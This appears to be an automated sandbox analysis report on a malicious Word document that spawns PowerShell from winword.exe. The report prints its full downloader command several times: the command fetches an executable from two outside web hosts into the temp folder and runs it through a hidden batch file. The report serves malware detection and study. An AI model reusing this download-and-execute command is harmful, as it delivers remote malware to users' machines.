NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\owernice38.bat

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile June 25, 2021, 8:44 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000198 filepath: C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"
cmdline	powershell "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')}
cmdline	powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden"

Word document hooks document open

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 25, 2021, 8:44 a.m.	thread_identifier: 6928 thread_handle: 0x000004b0 process_identifier: 5096 current_directory: filepath: track: 1 command_line: cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000004b4	1	1
CreateProcessInternalW June 25, 2021, 8:44 a.m.	thread_identifier: 8324 thread_handle: 0x00000084 process_identifier: 8728 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
ShellExecuteExW June 25, 2021, 8:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\owernice38.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\owernice38.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 25, 2021, 8:44 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 157 events)

Data received	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Jun 2021 23:51:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Cache-Control: no-cache Pragma: no-cache Set-Cookie: 7177df3407e5c06cf4c9705ffc741d09=a2db234cc53b502c74655f441bc26ece; path=/; HttpOnly Referrer-Policy: X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff 386 <!doctype html> <html class="error-page" lang="en-gb" dir="ltr"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Error: 404 Page not found</title> <link rel="icon" href="/images/k.png" /> <link href="/templates/themis/css/bootstrap.min.css" rel="stylesheet"> <link href="/templates/themis/css/font-awesome.min.css" rel="stylesheet"> <link href="/templates/themis/css/template.css" rel="stylesheet"> <link href="/templates/themis/css/presets/preset3.css" rel="stylesheet"> </head> <body> <div class="container"> <h1 class="error-code">404</h1> <h2 class="error-message">Page not found</h2> <a href="/index.php" class="btn btn-secondary"><span class="fa fa-home" aria-hidden="true"></span> Home Page</a> </div> </body> </html> 0
Data received	HTTP/1.1 301 Moved Permanently Date: Thu, 24 Jun 2021 23:51:47 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Location: http://www.starvdata.com/supetre.orau Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 404 Not Found Date: Thu, 24 Jun 2021 23:51:49 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.starvdata.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Vary: Accept-Encoding Keep-Alive: timeout=5, max=75 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 a3 <!DOCTYPE html> <html lang="en-US"> <head> <meta name="google-site-verification" content="yQPV7kVobmH4eg4iG-AecofKoBQlaTKi_tIqosCcVyI" /> <meta charset="
Data received	1
Data received	6
Data received
Data received
Data received	UTF-8" /> <title>
Data received
Data received	2
Data received	9
Data received	Page not found - Star Vertex</title>
Data received	c
Data received	5
Data received	<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.starvdata.com/xmlrpc.php" /> <link rel="shortcut icon" type="image/x-icon" href="https://www.starvdata.com/wp-content/uploads/2016/11/icon-1-1.png"> <link rel="apple-touch-icon" href="https://www.starvdata.com/wp-content/uploads/2016/11/icon-1-1.png"/>
Data received	e
Data received	<link href='//fonts.googleapis.com/css?family=Raleway:100,200,300,400,500,600,700,800,900,300italic,400italic\|Raleway:100,200,300,400,500,600,700,800,900,300italic,400italic&subset=latin,latin-ext' rel='stylesheet' type='text/css'>
Data received	<!-- This site is optimized with the Yoast SEO plugin v12.9.1 - https://yoast.com/wordpress/plugins/seo/ -->
Data received	f
Data received	<meta name="robots" content="noindex,follow"/>
Data received	<meta property="og:locale" content="en_US" />
Data received	8
Data received	<meta property="og:type" content="object
Data received	" />
Data received	3
Data received	<meta property="og:title" content="
Data received	Page not found - Star Vertex" />
Data received	<meta property="og:site_name" content="Star Vertex
Data received	7
Data received	4
Data received	<meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Page not found - Star Vertex" />
Data received	<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.starvdata.com/#website","url":"https://www.starvdata.com/","name":"Star Vertex","description":"Business Data Rentals","potentialAction":{"@type":"SearchAction","target":"https://www.starvdata.com/?s={search_term_string}","query-input":"required name=search_term_string"}}]}</script> <!-- / Yoast SEO plugin. -->
Data received	a
Data received	0
Data received	<link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' />
Data received	<link rel="alternate" type="application/rss+xml" title="Star Vertex » Feed" href="https://www.starvdata.com/feed/" />
Data received	<link rel="alternate" type="application/rss+xml" title="Star Vertex » Comments Feed" href="https://www.starvdata.com/comments/feed/" />
Data received	<script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.starvdata.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.8"}}; !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p\|\|!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,6503
Data received	9,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything\|\|(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",functi
Data received	on(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source\|\|{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings); </script>
Data received	<style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style>
Data received	<link rel='stylesheet' id='wp-block-library-css' href='http://www.starvdata.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.8' type='text/css' media='all' />
Data received	b
Data received	<link rel='stylesheet' id='layerslider-css' href='http://www.starvdata.com/wp-content/plugins/LayerSlider/static/css/layerslider.css?ver=5.2.0' type='text/css' media='all' />
Data received	d
Data received	<link rel='stylesheet' id='ls-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&subset=latin' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='contact-form-7-css' href='http://www.starvdata.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.6' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.starvdata.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.2.6' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style>
Data received	<link rel='stylesheet' id='default_style-css' href='http://www.starvdata.com/wp-content/themes/bridge/style.css?ver=5.3.8' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='qode_font_awesome-css' href='http://www.starvdata.com/wp-content/themes/bridge/css/font-awesome/css/font-awesome.min.css?ver=5.3.8' type='text/css' media='all' />

Poweshell is sending data to a remote host (3 events)

Data sent	GET /supetre.orau HTTP/1.1 Host: kalameafoods.gr Connection: Keep-Alive
Data sent	GET /supetre.orau HTTP/1.1 Host: starvdata.com Connection: Keep-Alive
Data sent	GET /supetre.orau HTTP/1.1 Host: www.starvdata.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 25, 2021, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 25, 2021, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\klerscor.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\owernice38.bat

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: kalameafoods.gr Connection: Keep-Alive socket: 1432 sent: 77	1	77
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: starvdata.com Connection: Keep-Alive socket: 1484 sent: 75	1	75
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: www.starvdata.com Connection: Keep-Alive socket: 1488 sent: 79	1	79

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\owernice38.bat
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\owernice38.bat"
parent_process	winword.exe	martian_process	cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\klerscor.exe

Powershell Downloader DFSP detected (1 event)

AuthenticationCode-3139821.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All